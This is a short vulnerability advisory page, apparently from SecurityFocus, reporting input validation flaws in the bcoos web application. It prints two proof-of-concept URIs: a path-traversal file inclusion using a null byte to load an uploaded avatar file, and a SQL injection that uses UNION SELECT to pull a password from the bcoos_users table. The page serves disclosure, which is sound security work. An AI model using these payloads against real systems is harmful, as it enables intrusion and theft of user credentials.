Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

bcoos Multiple Input Validation Vulnerabilities

Attackers can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/bcoos/modules/news/?xoopsOption[pagetype]=../../images/avatar/users/[uid].gif%00
http://www.example.com/bcoos/modules/banners/click.php?bid=-1 UNION SELECT pass FROM bcoos_users LIMIT 1







 

Privacy Statement
Copyright 2008, SecurityFocus